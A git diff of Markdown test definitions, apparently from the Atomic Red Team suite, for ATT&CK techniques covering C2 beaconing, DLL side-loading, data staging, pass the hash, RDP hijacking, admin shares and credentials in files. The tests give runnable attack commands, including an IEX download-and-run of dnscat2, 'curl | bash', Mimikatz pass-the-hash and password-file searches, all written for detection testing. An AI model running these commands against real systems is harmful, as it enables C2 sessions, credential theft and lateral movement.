+For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), +commonly used protocols are RPC, SSH, or RDP. ## Atomic Tests @@ -22,26 +25,23 @@ For connections that occur internally within an enclave (such as those between a - [Atomic Test #8 - OSTap Payload Download](#atomic-test-8---ostap-payload-download) -
## Atomic Test #1 - Malicious User Agents - Powershell + This test simulates an infected host beaconing to command and control. -Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat +Inspired by APTSimulator +- https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null @@ -50,31 +50,24 @@ Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | ou Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null ``` - - - - -

## Atomic Test #2 - Malicious User Agents - CMD + This test simulates an infected host beaconing to command and control. -Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat +Inspired by APTSimulator +- https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd curl -s -A "HttpBrowser/1.0" -m3 #{domain} @@ -83,31 +76,24 @@ curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} curl -s -A "*<|>*" -m3 #{domain} ``` - - - - -

## Atomic Test #3 - Malicious User Agents - Nix + This test simulates an infected host beaconing to command and control. -Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat +Inspired by APTSimulator +- https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh curl -s -A "HttpBrowser/1.0" -m3 #{domain} @@ -116,24 +102,19 @@ curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} curl -s -A "*<|>*" -m3 #{domain} ``` - - - - -

## Atomic Test #4 - DNS Large Query Volume + This test simulates an infected host sending a large volume of DNS queries to a command and control server. -The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. +The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source +system or to a single targe domain. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | 127.0.0.1.xip.io| @@ -141,32 +122,26 @@ The intent of this test is to trigger threshold based detection on the number of | query_type | DNS query type | string | TXT| | query_volume | Number of DNS queries to send | integer | 1000| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} ``` - - - - -

## Atomic Test #5 - DNS Regular Beaconing -This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. -This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. - -**Supported Platforms:** Windows - +This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over +time. +This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query +volume over time to evade threshold based detection. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | 127.0.0.1.xip.io| @@ -176,107 +151,83 @@ This behaviour is typical of implants either in an idle state waiting for instru | c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20| | runtime | Time in minutes to run the simulation | integer | 30| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime} ``` - - - - -

## Atomic Test #6 - DNS Long Domain Query + This test simulates an infected host returning data to a command and control server using long domain names. -The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. +The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The +intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | 127.0.0.1.xip.io| | subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte| | query_type | DNS query type | string | TXT| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} ``` - - - - -

## Atomic Test #7 - DNS C2 -This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. + +This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS +records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com| | server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} ``` - - - - -

## Atomic Test #8 - OSTap Payload Download + Uses cscript //E:jscript to download a file **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js| | file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} @@ -284,12 +235,9 @@ cscript //E:Jscript #{script_file} ``` #### Cleanup Commands: + ```cmd del #{script_file} /F /Q >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1073.md b/Atomic_Threat_Coverage/Triggers/T1073.md
index fb3f4686..81eeb282 100644
--- a/Atomic_Threat_Coverage/Triggers/T1073.md
+++ b/Atomic_Threat_Coverage/Triggers/T1073.md
@@ -1,59 +1,60 @@
 # T1073 - DLL Side-Loading
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1073)
+
Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014) -Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.
+Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or +software process. ## Atomic Tests - [Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary](#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary) -
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary -GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. + +GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus +enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_name | Name of the created process | string | calculator.exe| | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder\T1073\bin\GUP.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd #{gup_executable} ``` #### Cleanup Commands: + ```cmd taskkill /F /IM #{process_name} >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{gup_executable}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1073/bin/GUP.exe" -OutFile "#{gup_executable}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1074.md b/Atomic_Threat_Coverage/Triggers/T1074.md
index 013cd8d4..53a7ad3e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1074.md
+++ b/Atomic_Threat_Coverage/Triggers/T1074.md
@@ -1,8 +1,11 @@
 # T1074 - Data Staged
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074)
+
Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022). -Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
+Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) +and bash may be used to copy data into a staging location. ## Atomic Tests @@ -12,97 +15,77 @@ Interactive command shells may be used, and common functionality within [cmd](ht - [Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-3---zip-a-folder-with-powershell-for-staging-in-temp) -
## Atomic Test #1 - Stage data from Discovery.bat -Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, + +Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data +collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file} ``` #### Cleanup Commands: + ```powershell Remove-Item -Force #{output_file} -ErrorAction Ignore ``` - - - -

## Atomic Test #2 - Stage data from Discovery.sh + Utilize curl to download discovery.sh and execute a basic information gathering shell script **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log ``` - - - - -

## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp -Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip + +Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon +execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074\bin\Folder_to_zip| | output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force ``` #### Cleanup Commands: + ```powershell Remove-Item -Path #{output_file} -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1075.md b/Atomic_Threat_Coverage/Triggers/T1075.md
index d3ffaa93..5c2e4685 100644
--- a/Atomic_Threat_Coverage/Triggers/T1075.md
+++ b/Atomic_Threat_Coverage/Triggers/T1075.md
@@ -1,8 +1,11 @@
 # T1075 - Pass the Hash
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1075)
+
Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. -Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)
+Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: +NSA Spotting) ## Atomic Tests @@ -10,50 +13,40 @@ Windows 7 and higher with KB2871997 require valid domain user credentials or RID - [Atomic Test #2 - crackmapexec Pass the Hash](#atomic-test-2---crackmapexec-pass-the-hash) -
## Atomic Test #1 - Mimikatz Pass the Hash + Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | domain | domain | string | atomic.local| | ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} ``` - - - - -

## Atomic Test #2 - crackmapexec Pass the Hash + command execute with crackmapexec **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| @@ -62,29 +55,26 @@ command execute with crackmapexec | command | command to execute | string | whoami| | crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) + ##### Check Prereq Commands: + ```powershell if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } ``` + ##### Get Prereq Commands: + ```powershell Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1076.md b/Atomic_Threat_Coverage/Triggers/T1076.md
index 34d88ecc..57e78d4e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1076.md
+++ b/Atomic_Threat_Coverage/Triggers/T1076.md
@@ -1,10 +1,24 @@
 # T1076 - Remote Desktop Protocol
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1076)
-
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS. -Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware) +
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS. -Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)
+Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to +accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use +with RDP. Adversaries may also use RDP in conjunction with +the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: +Alperovitch Malware) + +Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. +Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With +System permissions and using Terminal Services Console, c: +\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for +credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with +active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead +to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain +Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also +been added as a feature in RedSnarf. (Citation: Kali Redsnarf)
## Atomic Tests @@ -12,26 +26,24 @@ Adversaries may also perform RDP session hijacking which involves stealing a leg - [Atomic Test #2 - RDPto-DomainController](#atomic-test-2---rdpto-domaincontroller) -
## Atomic Test #1 - RDP hijacking -RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization - -**Supported Platforms:** Windows - +RDP +hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) +- how to hijack RDS and RemoteApp sessions transparently to move through an organization +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | Session_ID | The ID of the session to which you want to connect | String | 1337| | Destination_ID | Connect the session of another user to a different session | String | rdp-tcp#55| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd query user @@ -40,54 +52,47 @@ net start sesshijack ``` #### Cleanup Commands: + ```cmd sc.exe delete sesshijack >nul 2>&1 ``` - - - -

## Atomic Test #2 - RDPto-DomainController + Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")| | username | Username argument default %USERDOMAIN%\%username% | String | $Env:USERDOMAIN\$ENV:USERNAME| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Connect-RDP -ComputerName #{logonserver} -User #{username} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Computer must be domain joined + ##### Check Prereq Commands: + ```powershell if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Joining this computer to a domain must be done manually ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1077.md b/Atomic_Threat_Coverage/Triggers/T1077.md
index 618446b6..8756294b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1077.md
+++ b/Atomic_Threat_Coverage/Triggers/T1077.md
@@ -1,10 +1,22 @@
 # T1077 - Windows Admin Shares
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1077)
+
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. -Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares) +Adversaries may use this technique in conjunction with +administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system +over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs) +, (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution +techniques that rely on authenticated sessions over SMB/RPC +are [Scheduled Task](https://attack.mitre.org/techniques/T1053) +, [Service Execution](https://attack.mitre.org/techniques/T1035), +and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). 
Adversaries can also use NTLM +hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and +certain configuration and patch levels. (Citation: Microsoft Admin Shares) -The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)
+The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote +systems using net use commands with valid credentials. (Citation: Technet Net Use) ## Atomic Tests @@ -16,18 +28,16 @@ The [Net](https://attack.mitre.org/software/S0039) utility can be used to connec - [Atomic Test #4 - Execute command writing output to local Admin Share](#atomic-test-4---execute-command-writing-output-to-local-admin-share) -
## Atomic Test #1 - Map admin share + Connecting To Remote Shares **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Examples C$, IPC$, Admin$ | String | C$| @@ -35,109 +45,80 @@ Connecting To Remote Shares | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" ``` - - - - -

## Atomic Test #2 - Map Admin Share PowerShell + Map Admin share utilizing PowerShell **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | share_name | Examples C$, IPC$, Admin$ | String | C$| | computer_name | Target Computer Name | String | Target| | map_name | Mapped Drive Letter | String | g| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} ``` - - - - -

## Atomic Test #3 - Copy and Execute File with PsExec -Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). - -**Supported Platforms:** Windows - +Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec +from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) +. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote computer to receive the copy and execute the file | String | \\localhost| | command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd psexec.exe #{remote_host} -c #{command_path} ``` - - - - -

## Atomic Test #4 - Execute command writing output to local Admin Share + Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Remote computer to receive the copy and execute the file | String | output.txt| | command_to_execute | Command to execute for output. | String | hostname| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1081.md b/Atomic_Threat_Coverage/Triggers/T1081.md
index 806c016f..5d8a96c7 100644
--- a/Atomic_Threat_Coverage/Triggers/T1081.md
+++ b/Atomic_Threat_Coverage/Triggers/T1081.md
@@ -1,10 +1,16 @@
 # T1081 - Credentials in Files
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1081)
+
Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. -It is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) +It is possible to extract passwords from backups or saved virtual machines +through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be +obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) -In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage) +In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In +some cases, these files can be copied and reused on another machine or the contents can be read and then used to +authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)
@@ -18,107 +24,72 @@ In cloud environments, authenticated user credentials are often stored in local - [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml) -
## Atomic Test #1 - Extract Browser and System credentials with LaZagne + [LaZagne Source](https://github.com/AlessandroZ/LaZagne) **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh python2 laZagne.py all ``` - - - - -

## Atomic Test #2 - Extract passwords with grep + Extracting credentials from files **Supported Platforms:** macOS, Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to search | String | /| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh grep -ri password #{file_path} ``` - - - - -

## Atomic Test #3 - Extracting passwords with findstr + Extracting Credentials from Files **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell findstr /si pass *.xml *.doc *.txt *.xls ls -R | select-string -Pattern password ``` - - - - -

## Atomic Test #4 - Access unattend.xml -Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. - -**Supported Platforms:** Windows - - - +Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation +logs are stored. -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd type C:\Windows\Panther\unattend.xml > nul 2>&1 type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1 ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1082.md b/Atomic_Threat_Coverage/Triggers/T1082.md
index c6ae995c..aec1fc93 100644
--- a/Atomic_Threat_Coverage/Triggers/T1082.md
+++ b/Atomic_Threat_Coverage/Triggers/T1082.md
@@ -1,26 +1,39 @@
 # T1082 - System Information Discovery
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1082)
+
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ### Windows -Example commands and utilities that obtain this information include ver, [Systeminfo](https://attack.mitre.org/software/S0096), and dir within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories. +Example commands and utilities that obtain this information include ver +, [Systeminfo](https://attack.mitre.org/software/S0096), and dir +within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and +directories. ### Mac -On Mac, the systemsetup command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the system_profiler gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and 